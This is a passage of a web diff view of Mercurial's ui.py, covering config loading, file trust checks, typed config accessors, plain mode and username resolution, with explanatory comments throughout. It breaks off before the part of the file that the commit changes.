##// END OF EJS Templates
ui: inline util.bytesinput() into ui._readline()...
Yuya Nishihara -
r36809:30742c21 default
parent child Browse files
Show More
@@ -1,1851 +1,1857
1 # ui.py - user interface bits for mercurial
1 # ui.py - user interface bits for mercurial
2 #
2 #
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import collections
10 import collections
11 import contextlib
11 import contextlib
12 import errno
12 import errno
13 import getpass
13 import getpass
14 import inspect
14 import inspect
15 import os
15 import os
16 import re
16 import re
17 import signal
17 import signal
18 import socket
18 import socket
19 import subprocess
19 import subprocess
20 import sys
20 import sys
21 import tempfile
21 import tempfile
22 import traceback
22 import traceback
23
23
24 from .i18n import _
24 from .i18n import _
25 from .node import hex
25 from .node import hex
26
26
27 from . import (
27 from . import (
28 color,
28 color,
29 config,
29 config,
30 configitems,
30 configitems,
31 encoding,
31 encoding,
32 error,
32 error,
33 formatter,
33 formatter,
34 progress,
34 progress,
35 pycompat,
35 pycompat,
36 rcutil,
36 rcutil,
37 scmutil,
37 scmutil,
38 util,
38 util,
39 )
39 )
40 from .utils import dateutil
40 from .utils import dateutil
41
41
# Local alias for util's urllib compatibility shim (py2/py3 differences are
# handled inside util).
urlreq = util.urlreq
43
43
# for use with str.translate(None, _keepalnum), to keep just alphanumerics
# NOTE: despite the name, this string contains every NON-alphanumeric byte;
# it is meant to be passed as translate()'s *deletechars* argument, which is
# what makes the translation keep only alphanumerics.
_keepalnum = ''.join(c for c in map(pycompat.bytechr, range(256))
                     if not c.isalnum())
47
47
# The config knobs that will be altered (if unset) by ui.tweakdefaults.
# Parsed and applied by ui._maybetweakdefaults(); each value here is only
# used when the user has not set that option explicitly.
tweakrc = b"""
[ui]
# The rollback command is dangerous. As a rule, don't use it.
rollback = False
# Make `hg status` report copy information
statuscopies = yes
# Prefer curses UIs when available. Revert to plain-text with `text`.
interface = curses

[commands]
# Make `hg status` emit cwd-relative paths by default.
status.relative = yes
# Refuse to perform an `hg update` that would cause a file content merge
update.check = noconflict

[diff]
git = 1
showfunc = 1
"""
68
68
# Sample hgrc contents, keyed by configuration scope ('user', 'cloned',
# 'local', 'global'). The 'cloned' template contains one %s placeholder for
# the clone's default path. Presumably consumed by config-editing commands —
# TODO confirm against callers (not visible in this file chunk).
samplehgrcs = {
    'user':
b"""# example user config (see 'hg help config' for more info)
[ui]
# name and email, e.g.
# username = Jane Doe <jdoe@example.com>
username =

# We recommend enabling tweakdefaults to get slight improvements to
# the UI over time. Make sure to set HGPLAIN in the environment when
# writing scripts!
# tweakdefaults = True

# uncomment to disable color in command output
# (see 'hg help color' for details)
# color = never

# uncomment to disable command output pagination
# (see 'hg help pager' for details)
# paginate = never

[extensions]
# uncomment these lines to enable some popular extensions
# (see 'hg help extensions' for more info)
#
# churn =
""",

    'cloned':
b"""# example repository config (see 'hg help config' for more info)
[paths]
default = %s

# path aliases to other clones of this repo in URLs or filesystem paths
# (see 'hg help config.paths' for more info)
#
# default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
# my-fork = ssh://jdoe@example.net/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone

[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <jdoe@example.com>
""",

    'local':
b"""# example repository config (see 'hg help config' for more info)
[paths]
# path aliases to other clones of this repo in URLs or filesystem paths
# (see 'hg help config.paths' for more info)
#
# default = http://example.com/hg/example-repo
# default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
# my-fork = ssh://jdoe@example.net/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone

[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <jdoe@example.com>
""",

    'global':
b"""# example system-wide hg config (see 'hg help config' for more info)

[ui]
# uncomment to disable color in command output
# (see 'hg help color' for details)
# color = never

# uncomment to disable command output pagination
# (see 'hg help pager' for details)
# paginate = never

[extensions]
# uncomment these lines to enable some popular extensions
# (see 'hg help extensions' for more info)
#
# blackbox =
# churn =
""",
}
150
150
def _maybestrurl(maybebytes):
    """Recursively convert bytes (or a container of bytes) to native str.

    Applies pycompat.strurl through util.rapply, so nested structures are
    converted element-wise. Used to hand URLs to stdlib APIs that expect
    native strings.
    """
    return util.rapply(pycompat.strurl, maybebytes)
153
153
def _maybebytesurl(maybestr):
    """Recursively convert native str (or a container of str) back to bytes.

    Inverse of _maybestrurl; applies pycompat.bytesurl through util.rapply.
    """
    return util.rapply(pycompat.bytesurl, maybestr)
156
156
class httppasswordmgrdbproxy(object):
    """Delays loading urllib2 until it's needed.

    Wraps urlreq.httppasswordmgrwithdefaultrealm and lazily instantiates it
    on first use. Arguments are converted bytes<->str at the boundary so
    callers can work in bytes while the underlying stdlib manager sees
    native strings.
    """
    def __init__(self):
        # Real password manager, created lazily by _get_mgr().
        self._mgr = None

    def _get_mgr(self):
        # Instantiate the underlying manager on first access only.
        if self._mgr is None:
            self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
        return self._mgr

    def add_password(self, realm, uris, user, passwd):
        # Convert all arguments to native str before delegating.
        return self._get_mgr().add_password(
            _maybestrurl(realm), _maybestrurl(uris),
            _maybestrurl(user), _maybestrurl(passwd))

    def find_user_password(self, realm, uri):
        # Delegate, then convert the (user, password) result back to bytes.
        mgr = self._get_mgr()
        return _maybebytesurl(mgr.find_user_password(_maybestrurl(realm),
                                                     _maybestrurl(uri)))
176
176
def _catchterm(*args):
    """Signal handler that turns a termination signal into SignalInterrupt.

    Accepts and ignores the (signum, frame) arguments that the signal
    module passes to handlers.
    """
    raise error.SignalInterrupt
179
179
# unique object used to detect no default value has been provided when
# retrieving configuration value.
# Identity comparison ("is _unset") distinguishes "caller passed no default"
# from any real default value, including None.
_unset = object()

# _reqexithandlers: callbacks run at the end of a request
_reqexithandlers = []
186
186
187 class ui(object):
187 class ui(object):
    def __init__(self, src=None):
        """Create a fresh new ui object if no src given

        Use uimod.ui.load() to create a ui which knows global and user configs.
        In most cases, you should use ui.copy() to create a copy of an existing
        ui object.

        When ``src`` is given, streams and the httppasswordmgrdb are shared
        with it, config objects and trust sets are copied, and fixconfig()
        is re-run so derived flags match the copied configs.
        """
        # _buffers: used for temporary capture of output
        self._buffers = []
        # 3-tuple describing how each buffer in the stack behaves.
        # Values are (capture stderr, capture subprocesses, apply labels).
        self._bufferstates = []
        # When a buffer is active, defines whether we are expanding labels.
        # This exists to prevent an extra list lookup.
        self._bufferapplylabels = None
        self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
        self._reportuntrusted = True
        # Registry of known config items (used for default/alias lookup).
        self._knownconfig = configitems.coreitems
        self._ocfg = config.config() # overlay
        self._tcfg = config.config() # trusted
        self._ucfg = config.config() # untrusted
        self._trustusers = set()
        self._trustgroups = set()
        self.callhooks = True
        # Insecure server connections requested.
        self.insecureconnections = False
        # Blocked time
        self.logblockedtimes = False
        # color mode: see mercurial/color.py for possible value
        self._colormode = None
        self._terminfoparams = {}
        self._styles = {}

        if src:
            # Copy constructor: share streams, copy config state.
            self.fout = src.fout
            self.ferr = src.ferr
            self.fin = src.fin
            self.pageractive = src.pageractive
            self._disablepager = src._disablepager
            self._tweaked = src._tweaked

            self._tcfg = src._tcfg.copy()
            self._ucfg = src._ucfg.copy()
            self._ocfg = src._ocfg.copy()
            self._trustusers = src._trustusers.copy()
            self._trustgroups = src._trustgroups.copy()
            self.environ = src.environ
            self.callhooks = src.callhooks
            self.insecureconnections = src.insecureconnections
            self._colormode = src._colormode
            self._terminfoparams = src._terminfoparams.copy()
            self._styles = src._styles.copy()

            # Recompute derived flags (verbose/quiet/etc.) from the copied
            # configs.
            self.fixconfig()

            # Shared (not copied): password db and blocked-time counters.
            self.httppasswordmgrdb = src.httppasswordmgrdb
            self._blockedtimes = src._blockedtimes
        else:
            self.fout = util.stdout
            self.ferr = util.stderr
            self.fin = util.stdin
            self.pageractive = False
            self._disablepager = False
            self._tweaked = False

            # shared read-only environment
            self.environ = encoding.environ

            self.httppasswordmgrdb = httppasswordmgrdbproxy()
            self._blockedtimes = collections.defaultdict(int)

        # Restrict which environment variables may be exported (e.g. to
        # subprocesses/hooks); '*' exports everything.
        allowed = self.configlist('experimental', 'exportableenviron')
        if '*' in allowed:
            self._exportableenviron = self.environ
        else:
            self._exportableenviron = {}
            for k in allowed:
                if k in self.environ:
                    self._exportableenviron[k] = self.environ[k]
267
267
    @classmethod
    def load(cls):
        """Create a ui and load global and user configs"""
        u = cls()
        # we always trust global config files and environment variables
        # rccomponents() yields (type, value) pairs: 'path' carries a config
        # file name, 'items' carries pre-parsed (section, name, value,
        # source) tuples.
        for t, f in rcutil.rccomponents():
            if t == 'path':
                u.readconfig(f, trust=True)
            elif t == 'items':
                sections = set()
                for section, name, value, source in f:
                    # do not set u._ocfg
                    # XXX clean this up once immutable config object is a thing
                    u._tcfg.set(section, name, value, source)
                    u._ucfg.set(section, name, value, source)
                    sections.add(section)
                # Re-derive per-section state once per touched section.
                for section in sections:
                    u.fixconfig(section=section)
            else:
                raise error.ProgrammingError('unknown rctype: %s' % t)
        u._maybetweakdefaults()
        return u
290
290
    def _maybetweakdefaults(self):
        """Apply the tweakrc overrides if ui.tweakdefaults is enabled.

        No-op when the knob is off, when the tweaks were already applied,
        or when plain mode (HGPLAIN) disables them. Only options the user
        has not set explicitly are overridden.
        """
        if not self.configbool('ui', 'tweakdefaults'):
            return
        if self._tweaked or self.plain('tweakdefaults'):
            return

        # Note: it is SUPER IMPORTANT that you set self._tweaked to
        # True *before* any calls to setconfig(), otherwise you'll get
        # infinite recursion between setconfig and this method.
        #
        # TODO: We should extract an inner method in setconfig() to
        # avoid this weirdness.
        self._tweaked = True
        tmpcfg = config.config()
        tmpcfg.parse('<tweakdefaults>', tweakrc)
        for section in tmpcfg:
            for name, value in tmpcfg.items(section):
                # hasconfig() check preserves any user-specified value.
                if not self.hasconfig(section, name):
                    self.setconfig(section, name, value, "<tweakdefaults>")
310
310
311 def copy(self):
311 def copy(self):
312 return self.__class__(self)
312 return self.__class__(self)
313
313
    def resetstate(self):
        """Clear internal state that shouldn't persist across commands"""
        # NOTE(review): self._progbar is not assigned in the visible part of
        # this file — presumably installed elsewhere (progress setup); verify.
        if self._progbar:
            self._progbar.resetstate() # reset last-print time of progress bar
        # Drop cached HTTP credentials between commands.
        self.httppasswordmgrdb = httppasswordmgrdbproxy()
319
319
    @contextlib.contextmanager
    def timeblockedsection(self, key):
        """Context manager accumulating wall-clock time spent in its body.

        The elapsed time (in milliseconds) is added to
        self._blockedtimes['<key>_blocked'], even if the body raises.
        """
        # this is open-coded below - search for timeblockedsection to find them
        starttime = util.timer()
        try:
            yield
        finally:
            self._blockedtimes[key + '_blocked'] += \
                (util.timer() - starttime) * 1000
329
329
    def formatter(self, topic, opts):
        """Return a formatter for ``topic`` configured from ``opts``.

        Thin convenience wrapper around formatter.formatter(), passing this
        ui both as the ui and as the output target.
        """
        return formatter.formatter(self, self, topic, opts)
332
332
    def _trusted(self, fp, f):
        """Return True if the open config file ``fp`` (named ``f``) is trusted.

        A file is trusted when we own it, when '*' appears in the trusted
        users/groups config, or when its owner/group matches the configured
        trust lists (or the current user). Otherwise optionally warn and
        return False.
        """
        st = util.fstat(fp)
        if util.isowner(st):
            return True

        tusers, tgroups = self._trustusers, self._trustgroups
        if '*' in tusers or '*' in tgroups:
            return True

        user = util.username(st.st_uid)
        group = util.groupname(st.st_gid)
        if user in tusers or group in tgroups or user == util.username():
            return True

        if self._reportuntrusted:
            self.warn(_('not trusting file %s from untrusted '
                        'user %s, group %s\n') % (f, user, group))
        return False
351
351
    def readconfig(self, filename, root=None, trust=False,
                   sections=None, remap=None):
        """Read ``filename`` into the trusted/untrusted config overlays.

        A missing file is silently ignored unless specific ``sections`` were
        requested. Untrusted files feed only the untrusted config; parse
        errors in untrusted files are downgraded to warnings. In plain
        (HGPLAIN) mode, UI-affecting options, defaults, command options and
        (unless excepted) aliases are stripped before merging. ``root``
        anchors relative [paths] entries (defaults to $HOME).
        """
        try:
            fp = open(filename, u'rb')
        except IOError:
            if not sections: # ignore unless we were looking for something
                return
            raise

        cfg = config.config()
        trusted = sections or trust or self._trusted(fp, filename)

        try:
            cfg.read(filename, fp, sections=sections, remap=remap)
            fp.close()
        except error.ConfigError as inst:
            if trusted:
                raise
            self.warn(_("ignored: %s\n") % util.forcebytestr(inst))

        if self.plain():
            # Plain mode: strip options that change output or behavior in
            # ways scripts should not see.
            for k in ('debug', 'fallbackencoding', 'quiet', 'slash',
                      'logtemplate', 'statuscopies', 'style',
                      'traceback', 'verbose'):
                if k in cfg['ui']:
                    del cfg['ui'][k]
            for k, v in cfg.items('defaults'):
                del cfg['defaults'][k]
            for k, v in cfg.items('commands'):
                del cfg['commands'][k]
        # Don't remove aliases from the configuration if in the exceptionlist
        if self.plain('alias'):
            for k, v in cfg.items('alias'):
                del cfg['alias'][k]
        if self.plain('revsetalias'):
            for k, v in cfg.items('revsetalias'):
                del cfg['revsetalias'][k]
        if self.plain('templatealias'):
            for k, v in cfg.items('templatealias'):
                del cfg['templatealias'][k]

        if trusted:
            self._tcfg.update(cfg)
            # Re-apply overlay (command line) settings so they keep priority.
            self._tcfg.update(self._ocfg)
        self._ucfg.update(cfg)
        self._ucfg.update(self._ocfg)

        if root is None:
            root = os.path.expanduser('~')
        self.fixconfig(root=root)
402
402
    def fixconfig(self, root=None, section=None):
        """Normalize config state after options change.

        With ``section`` None all sections are processed; otherwise only the
        named one. 'paths' entries are expanded and made absolute relative
        to ``root`` (default: cwd); 'ui' recomputes the debug/verbose/quiet
        flags; 'trusted' refreshes the trust sets.
        """
        if section in (None, 'paths'):
            # expand vars and ~
            # translate paths relative to root (or home) into absolute paths
            root = root or pycompat.getcwd()
            for c in self._tcfg, self._ucfg, self._ocfg:
                for n, p in c.items('paths'):
                    # Ignore sub-options.
                    if ':' in n:
                        continue
                    if not p:
                        continue
                    if '%%' in p:
                        # Legacy escaping of '%'; warn and unescape.
                        s = self.configsource('paths', n) or 'none'
                        self.warn(_("(deprecated '%%' in path %s=%s from %s)\n")
                                  % (n, p, s))
                        p = p.replace('%%', '%')
                    p = util.expandpath(p)
                    if not util.hasscheme(p) and not os.path.isabs(p):
                        p = os.path.normpath(os.path.join(root, p))
                    c.set("paths", n, p)

        if section in (None, 'ui'):
            # update ui options
            self.debugflag = self.configbool('ui', 'debug')
            self.verbose = self.debugflag or self.configbool('ui', 'verbose')
            self.quiet = not self.debugflag and self.configbool('ui', 'quiet')
            # verbose and quiet are contradictory; cancel both.
            if self.verbose and self.quiet:
                self.quiet = self.verbose = False
            self._reportuntrusted = self.debugflag or self.configbool("ui",
                "report_untrusted")
            self.tracebackflag = self.configbool('ui', 'traceback')
            self.logblockedtimes = self.configbool('ui', 'logblockedtimes')

        if section in (None, 'trusted'):
            # update trust information
            self._trustusers.update(self.configlist('trusted', 'users'))
            self._trustgroups.update(self.configlist('trusted', 'groups'))
441
441
    def backupconfig(self, section, item):
        """Snapshot one config item across all three overlays.

        Returns an opaque 3-tuple (overlay, trusted, untrusted backups)
        suitable for restoreconfig().
        """
        return (self._ocfg.backup(section, item),
                self._tcfg.backup(section, item),
                self._ucfg.backup(section, item),)
    def restoreconfig(self, data):
        """Restore a config item snapshot produced by backupconfig().

        ``data`` is the (overlay, trusted, untrusted) backup tuple; each
        element is replayed into its corresponding config object.
        """
        self._ocfg.restore(data[0])
        self._tcfg.restore(data[1])
        self._ucfg.restore(data[2])
450
450
    def setconfig(self, section, name, value, source=''):
        """Set a config value in all three overlays (overlay wins on read).

        Re-runs fixconfig for the touched section and re-checks
        tweakdefaults (which guards itself against recursing back here).
        """
        for cfg in (self._ocfg, self._tcfg, self._ucfg):
            cfg.set(section, name, value, source)
        self.fixconfig(section=section)
        self._maybetweakdefaults()
456
456
457 def _data(self, untrusted):
457 def _data(self, untrusted):
458 return untrusted and self._ucfg or self._tcfg
458 return untrusted and self._ucfg or self._tcfg
459
459
    def configsource(self, section, name, untrusted=False):
        """Return where a config value came from (e.g. file:line), or None.

        Reads from the untrusted or trusted config per ``untrusted``.
        """
        return self._data(untrusted).source(section, name)
462
462
463 def config(self, section, name, default=_unset, untrusted=False):
463 def config(self, section, name, default=_unset, untrusted=False):
464 """return the plain string version of a config"""
464 """return the plain string version of a config"""
465 value = self._config(section, name, default=default,
465 value = self._config(section, name, default=default,
466 untrusted=untrusted)
466 untrusted=untrusted)
467 if value is _unset:
467 if value is _unset:
468 return None
468 return None
469 return value
469 return value
470
470
    def _config(self, section, name, default=_unset, untrusted=False):
        """Look up a config value, consulting registered item metadata.

        Resolution order: the first set value among (section, name) and the
        registered item's aliases; otherwise the caller's ``default``;
        otherwise the registered item's default. Emits develwarn()s for
        unregistered items, for registered dynamic-default items accessed
        without an explicit default, and for defaults that contradict the
        registration. May return the ``_unset`` sentinel when no value and
        no usable default exist.
        """
        value = itemdefault = default
        item = self._knownconfig.get(section, {}).get(name)
        alternates = [(section, name)]

        if item is not None:
            alternates.extend(item.alias)
            # item.default may be a factory callable producing the default.
            if callable(item.default):
                itemdefault = item.default()
            else:
                itemdefault = item.default
        else:
            msg = ("accessing unregistered config item: '%s.%s'")
            msg %= (section, name)
            self.develwarn(msg, 2, 'warn-config-unknown')

        if default is _unset:
            if item is None:
                value = default
            elif item.default is configitems.dynamicdefault:
                value = None
                msg = "config item requires an explicit default value: '%s.%s'"
                msg %= (section, name)
                self.develwarn(msg, 2, 'warn-config-default')
            else:
                value = itemdefault
        elif (item is not None
              and item.default is not configitems.dynamicdefault
              and default != itemdefault):
            msg = ("specifying a mismatched default value for a registered "
                   "config item: '%s.%s' '%s'")
            msg %= (section, name, pycompat.bytestr(default))
            self.develwarn(msg, 2, 'warn-config-default')

        # First set value among the name and its aliases wins.
        for s, n in alternates:
            candidate = self._data(untrusted).get(s, n, None)
            if candidate is not None:
                value = candidate
                section = s
                name = n
                break

        if self.debugflag and not untrusted and self._reportuntrusted:
            # Report untrusted settings that would have changed the answer.
            for s, n in alternates:
                uvalue = self._ucfg.get(s, n)
                if uvalue is not None and uvalue != value:
                    self.debug("ignoring untrusted configuration option "
                               "%s.%s = %s\n" % (s, n, uvalue))
        return value
520
520
    def configsuboptions(self, section, name, default=_unset, untrusted=False):
        """Get a config option and all sub-options.

        Some config options have sub-options that are declared with the
        format "key:opt = value". This method is used to return the main
        option and all its declared sub-options.

        Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
        is a dict of defined sub-options where keys and values are strings.
        """
        # the main option goes through the regular config() machinery
        main = self.config(section, name, default, untrusted=untrusted)
        data = self._data(untrusted)
        sub = {}
        prefix = '%s:' % name
        # collect every "name:subopt" entry of the section, keyed by "subopt"
        for k, v in data.items(section):
            if k.startswith(prefix):
                sub[k[len(prefix):]] = v

        if self.debugflag and not untrusted and self._reportuntrusted:
            # in debug mode, report untrusted sub-option values that were
            # shadowed by the trusted configuration
            for k, v in sub.items():
                uvalue = self._ucfg.get(section, '%s:%s' % (name, k))
                if uvalue is not None and uvalue != v:
                    self.debug('ignoring untrusted configuration option '
                               '%s:%s.%s = %s\n' % (section, name, k, uvalue))

        return main, sub
547
547
    def configpath(self, section, name, default=_unset, untrusted=False):
        'get a path config item, expanded relative to repo root or config file'
        v = self.config(section, name, default, untrusted)
        if v is None:
            return None
        # NOTE(review): because this is 'or', any value that is not a URL is
        # rebased onto the directory of the config file that defined it, even
        # if it is already absolute -- confirm intended before changing.
        if not os.path.isabs(v) or "://" not in v:
            src = self.configsource(section, name, untrusted)
            if ':' in src:
                # src looks like "path/to/file:lineno"; keep the path part
                base = os.path.dirname(src.rsplit(':')[0])
                v = os.path.join(base, os.path.expanduser(v))
        return v
559
559
    def configbool(self, section, name, default=_unset, untrusted=False):
        """parse a configuration element as a boolean

        >>> u = ui(); s = b'foo'
        >>> u.setconfig(s, b'true', b'yes')
        >>> u.configbool(s, b'true')
        True
        >>> u.setconfig(s, b'false', b'no')
        >>> u.configbool(s, b'false')
        False
        >>> u.configbool(s, b'unknown')
        False
        >>> u.configbool(s, b'unknown', True)
        True
        >>> u.setconfig(s, b'invalid', b'somevalue')
        >>> u.configbool(s, b'invalid')
        Traceback (most recent call last):
            ...
        ConfigError: foo.invalid is not a boolean ('somevalue')
        """

        v = self._config(section, name, default, untrusted=untrusted)
        if v is None:
            return v
        if v is _unset:
            # nothing configured and no caller-supplied default
            if default is _unset:
                return False
            return default
        if isinstance(v, bool):
            # registered defaults may already be booleans; pass them through
            return v
        b = util.parsebool(v)
        if b is None:
            raise error.ConfigError(_("%s.%s is not a boolean ('%s')")
                                    % (section, name, v))
        return b
595
595
    def configwith(self, convert, section, name, default=_unset,
                   desc=None, untrusted=False):
        """parse a configuration element with a conversion function

        >>> u = ui(); s = b'foo'
        >>> u.setconfig(s, b'float1', b'42')
        >>> u.configwith(float, s, b'float1')
        42.0
        >>> u.setconfig(s, b'float2', b'-4.25')
        >>> u.configwith(float, s, b'float2')
        -4.25
        >>> u.configwith(float, s, b'unknown', 7)
        7.0
        >>> u.setconfig(s, b'invalid', b'somevalue')
        >>> u.configwith(float, s, b'invalid')
        Traceback (most recent call last):
            ...
        ConfigError: foo.invalid is not a valid float ('somevalue')
        >>> u.configwith(float, s, b'invalid', desc=b'womble')
        Traceback (most recent call last):
            ...
        ConfigError: foo.invalid is not a valid womble ('somevalue')
        """

        v = self.config(section, name, default, untrusted)
        if v is None:
            return v # do not attempt to convert None
        try:
            return convert(v)
        except (ValueError, error.ParseError):
            # without an explicit description, name the converter in the error
            if desc is None:
                desc = pycompat.sysbytes(convert.__name__)
            raise error.ConfigError(_("%s.%s is not a valid %s ('%s')")
                                    % (section, name, desc, v))
630
630
631 def configint(self, section, name, default=_unset, untrusted=False):
631 def configint(self, section, name, default=_unset, untrusted=False):
632 """parse a configuration element as an integer
632 """parse a configuration element as an integer
633
633
634 >>> u = ui(); s = b'foo'
634 >>> u = ui(); s = b'foo'
635 >>> u.setconfig(s, b'int1', b'42')
635 >>> u.setconfig(s, b'int1', b'42')
636 >>> u.configint(s, b'int1')
636 >>> u.configint(s, b'int1')
637 42
637 42
638 >>> u.setconfig(s, b'int2', b'-42')
638 >>> u.setconfig(s, b'int2', b'-42')
639 >>> u.configint(s, b'int2')
639 >>> u.configint(s, b'int2')
640 -42
640 -42
641 >>> u.configint(s, b'unknown', 7)
641 >>> u.configint(s, b'unknown', 7)
642 7
642 7
643 >>> u.setconfig(s, b'invalid', b'somevalue')
643 >>> u.setconfig(s, b'invalid', b'somevalue')
644 >>> u.configint(s, b'invalid')
644 >>> u.configint(s, b'invalid')
645 Traceback (most recent call last):
645 Traceback (most recent call last):
646 ...
646 ...
647 ConfigError: foo.invalid is not a valid integer ('somevalue')
647 ConfigError: foo.invalid is not a valid integer ('somevalue')
648 """
648 """
649
649
650 return self.configwith(int, section, name, default, 'integer',
650 return self.configwith(int, section, name, default, 'integer',
651 untrusted)
651 untrusted)
652
652
    def configbytes(self, section, name, default=_unset, untrusted=False):
        """parse a configuration element as a quantity in bytes

        Units can be specified as b (bytes), k or kb (kilobytes), m or
        mb (megabytes), g or gb (gigabytes).

        >>> u = ui(); s = b'foo'
        >>> u.setconfig(s, b'val1', b'42')
        >>> u.configbytes(s, b'val1')
        42
        >>> u.setconfig(s, b'val2', b'42.5 kb')
        >>> u.configbytes(s, b'val2')
        43520
        >>> u.configbytes(s, b'unknown', b'7 MB')
        7340032
        >>> u.setconfig(s, b'invalid', b'somevalue')
        >>> u.configbytes(s, b'invalid')
        Traceback (most recent call last):
            ...
        ConfigError: foo.invalid is not a byte quantity ('somevalue')
        """

        value = self._config(section, name, default, untrusted)
        if value is _unset:
            # nothing configured: fall back to the caller's default, or 0
            if default is _unset:
                default = 0
            value = default
        if not isinstance(value, bytes):
            # numeric defaults are returned untouched
            return value
        try:
            return util.sizetoint(value)
        except error.ParseError:
            raise error.ConfigError(_("%s.%s is not a byte quantity ('%s')")
                                    % (section, name, value))
687
687
    def configlist(self, section, name, default=_unset, untrusted=False):
        """parse a configuration element as a list of comma/space separated
        strings

        >>> u = ui(); s = b'foo'
        >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
        >>> u.configlist(s, b'list1')
        ['this', 'is', 'a small', 'test']
        >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
        >>> u.configlist(s, b'list2')
        ['this', 'is', 'a small', 'test']
        """
        # default is not always a list
        v = self.configwith(config.parselist, section, name, default,
                            'list', untrusted)
        if isinstance(v, bytes):
            # a bytes default passed through configwith unparsed; split it now
            return config.parselist(v)
        elif v is None:
            return []
        return v
708
708
    def configdate(self, section, name, default=_unset, untrusted=False):
        """parse a configuration element as a tuple of ints

        >>> u = ui(); s = b'foo'
        >>> u.setconfig(s, b'date', b'0 0')
        >>> u.configdate(s, b'date')
        (0, 0)
        """
        # only parse when a value is actually configured; otherwise return
        # the caller-supplied default (or None when no default was given)
        if self.config(section, name, default, untrusted):
            return self.configwith(dateutil.parsedate, section, name, default,
                                   'date', untrusted)
        if default is _unset:
            return None
        return default
723
723
724 def hasconfig(self, section, name, untrusted=False):
724 def hasconfig(self, section, name, untrusted=False):
725 return self._data(untrusted).hasitem(section, name)
725 return self._data(untrusted).hasitem(section, name)
726
726
727 def has_section(self, section, untrusted=False):
727 def has_section(self, section, untrusted=False):
728 '''tell whether section exists in config.'''
728 '''tell whether section exists in config.'''
729 return section in self._data(untrusted)
729 return section in self._data(untrusted)
730
730
    def configitems(self, section, untrusted=False, ignoresub=False):
        """Return the list of (name, value) pairs of ``section``.

        With ``ignoresub=True``, entries spelled "name:subopt" (sub-options,
        see configsuboptions()) are filtered out.
        """
        items = self._data(untrusted).items(section)
        if ignoresub:
            # keep only plain option names; ':' marks a sub-option
            newitems = {}
            for k, v in items:
                if ':' not in k:
                    newitems[k] = v
            items = list(newitems.iteritems())
        if self.debugflag and not untrusted and self._reportuntrusted:
            # in debug mode, point out untrusted values that differ from the
            # trusted configuration being returned
            for k, v in self._ucfg.items(section):
                if self._tcfg.get(section, k) != v:
                    self.debug("ignoring untrusted configuration option "
                               "%s.%s = %s\n" % (section, k, v))
        return items
745
745
746 def walkconfig(self, untrusted=False):
746 def walkconfig(self, untrusted=False):
747 cfg = self._data(untrusted)
747 cfg = self._data(untrusted)
748 for section in cfg.sections():
748 for section in cfg.sections():
749 for name, value in self.configitems(section, untrusted):
749 for name, value in self.configitems(section, untrusted):
750 yield section, name, value
750 yield section, name, value
751
751
    def plain(self, feature=None):
        '''is plain mode active?

        Plain mode means that all configuration variables which affect
        the behavior and output of Mercurial should be
        ignored. Additionally, the output should be stable,
        reproducible and suitable for use in scripts or applications.

        The only way to trigger plain mode is by setting either the
        `HGPLAIN' or `HGPLAINEXCEPT' environment variables.

        The return value can either be
        - False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
        - False if feature is disabled by default and not included in HGPLAIN
        - True otherwise
        '''
        if ('HGPLAIN' not in encoding.environ and
            'HGPLAINEXCEPT' not in encoding.environ):
            return False
        exceptions = encoding.environ.get('HGPLAINEXCEPT',
                '').strip().split(',')
        # TODO: add support for HGPLAIN=+feature,-feature syntax
        if '+strictflags' not in encoding.environ.get('HGPLAIN', '').split(','):
            # strict flag parsing stays opt-in: treat it as excepted unless
            # '+strictflags' is explicitly listed in HGPLAIN
            exceptions.append('strictflags')
        if feature and exceptions:
            return feature not in exceptions
        return True
779
779
    def username(self, acceptempty=False):
        """Return default username to be used in commits.

        Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
        and stop searching if one of these is set.
        If not found and acceptempty is True, returns None.
        If not found and ui.askusername is True, ask the user, else use
        ($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
        If no username could be found, raise an Abort error.
        """
        # 1. environment
        user = encoding.environ.get("HGUSER")
        if user is None:
            # 2. configuration ([ui] username), with env vars expanded
            user = self.config("ui", "username")
            if user is not None:
                user = os.path.expandvars(user)
        if user is None:
            # 3. EMAIL environment variable
            user = encoding.environ.get("EMAIL")
        if user is None and acceptempty:
            return user
        if user is None and self.configbool("ui", "askusername"):
            # 4. interactively prompt when configured to do so
            user = self.prompt(_("enter a commit username:"), default=None)
        if user is None and not self.interactive():
            try:
                # 5. last resort: synthesize "login@fqdn"
                user = '%s@%s' % (util.getuser(),
                                  encoding.strtolocal(socket.getfqdn()))
                self.warn(_("no username found, using '%s' instead\n") % user)
            except KeyError:
                # no login name available; fall through to the Abort below
                pass
        if not user:
            raise error.Abort(_('no username supplied'),
                              hint=_("use 'hg config --edit' "
                                     'to set your username'))
        if "\n" in user:
            # a newline would corrupt the commit metadata
            raise error.Abort(_("username %r contains a newline\n")
                              % pycompat.bytestr(user))
        return user
816
816
817 def shortuser(self, user):
817 def shortuser(self, user):
818 """Return a short representation of a user name or email address."""
818 """Return a short representation of a user name or email address."""
819 if not self.verbose:
819 if not self.verbose:
820 user = util.shortuser(user)
820 user = util.shortuser(user)
821 return user
821 return user
822
822
823 def expandpath(self, loc, default=None):
823 def expandpath(self, loc, default=None):
824 """Return repository location relative to cwd or from [paths]"""
824 """Return repository location relative to cwd or from [paths]"""
825 try:
825 try:
826 p = self.paths.getpath(loc)
826 p = self.paths.getpath(loc)
827 if p:
827 if p:
828 return p.rawloc
828 return p.rawloc
829 except error.RepoError:
829 except error.RepoError:
830 pass
830 pass
831
831
832 if default:
832 if default:
833 try:
833 try:
834 p = self.paths.getpath(default)
